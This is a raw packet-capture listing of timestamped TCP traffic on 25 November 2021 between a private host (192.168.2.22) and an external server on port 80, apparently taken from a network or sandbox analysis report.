Nov 25, 2021 18:21:20.803627968 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.803630114 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.803670883 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935228109 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935291052 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935309887 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935328960 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935461998 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935811043 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935843945 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935869932 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935882092 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935895920 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935904026 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935920000 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935925007 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935942888 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935945034 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935955048 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935967922 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.935972929 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.935995102 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936007023 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936019897 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936043024 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936044931 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936058044 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936070919 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936074972 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936095953 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936105013 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936129093 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936763048 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936799049 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936897993 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936925888 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.936935902 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936949968 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.936958075 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.937318087 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.937350035 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.937375069 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.937392950 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.937458038 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.937467098 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.937966108 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.937997103 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938023090 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938033104 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938107014 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938133955 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938230991 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938335896 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938375950 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938436031 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938474894 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938494921 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938520908 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938529968 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938549042 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938663960 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938687086 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938714981 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938719988 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938747883 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.938775063 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.938807011 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.939079046 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.939107895 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.939130068 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.939131021 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.939155102 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.939156055 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.939177036 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.939193964 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946063995 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946095943 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946115017 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946131945 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946185112 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946212053 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946326017 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946343899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946360111 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946377993 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946414948 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946510077 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946527004 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946537971 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946552992 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946571112 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946574926 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946590900 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946624994 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946707964 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946916103 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946945906 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946976900 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.946980000 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.946995020 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947051048 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947273016 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947293043 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947310925 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947314978 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947326899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947344065 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947362900 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947412968 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947429895 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947451115 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947470903 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947474003 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947487116 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947505951 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947527885 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947608948 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947664976 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947726011 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947735071 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947743893 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947786093 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947846889 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947865009 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947874069 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947884083 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947900057 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947911024 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947927952 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.947945118 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.947958946 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948076010 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948093891 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948112965 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948126078 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948127985 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948188066 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948205948 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948215008 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948240042 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948249102 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948266029 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948286057 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948308945 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948365927 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948402882 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948415041 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948448896 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948448896 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948486090 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948504925 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948542118 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948802948 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948822021 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948863983 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948874950 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948883057 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948901892 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.948920965 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.948942900 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.949032068 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:20.949076891 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:20.955594063 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.085674047 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085705996 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085717916 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085733891 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085802078 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085829973 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085870981 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085881948 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.085908890 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.085916996 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085925102 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.085954905 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.085969925 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.085985899 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086061001 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086076021 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086106062 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086126089 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086153030 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086188078 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086237907 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086321115 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086342096 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086359024 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086401939 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086426973 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086484909 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086513042 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086536884 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086536884 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086546898 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086566925 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086639881 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086663961 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086683035 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086687088 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086705923 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086709023 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086719036 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086730003 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086735964 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086765051 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086824894 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086848021 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086857080 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086869955 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086909056 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086929083 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.086946964 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.086960077 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087058067 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087080956 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087100983 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087102890 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087116957 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087126017 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087152958 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087207079 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087233067 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087240934 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087315083 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087337971 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087359905 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087361097 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087377071 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087409973 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087414980 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087523937 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087548971 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087570906 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087572098 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087580919 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087594986 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087605953 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087616920 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087624073 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087639093 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087647915 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087660074 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087691069 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087713957 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087733984 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087735891 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087743998 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087755919 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087758064 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087785006 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087807894 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087831020 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087852955 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087853909 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.087862015 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.087889910 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.091253042 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.095366001 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095402002 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095419884 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095442057 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095541000 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.095630884 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095678091 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095698118 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.095701933 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095726967 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095745087 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.095822096 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.095882893 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095909119 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095932007 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.095957041 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096060991 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096066952 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096086025 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096138000 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096163034 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096163034 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096208096 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096214056 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096318007 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096385002 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096412897 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096437931 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096448898 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096465111 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096493006 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096497059 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096518040 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096529007 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096543074 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096568108 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096626997 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096662045 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096677065 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096703053 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096728086 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096752882 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096796989 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096806049 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096812963 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096816063 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096838951 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096879959 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096880913 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096884012 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096904993 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.096920013 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.096965075 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.097012043 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.097070932 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.097127914 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.097150087 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:21.097186089 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.097198963 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:21.097316027 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.214507103 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.361299992 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.361383915 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.364023924 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.511565924 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.511601925 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.511624098 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.511689901 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.511775970 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.511830091 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.658314943 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658373117 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658389091 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658405066 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658485889 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.658766031 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658807039 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658826113 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.658853054 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.658912897 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.658924103 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805289030 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805351973 CET	80	49168	173.232.204.89	192.168.2.22
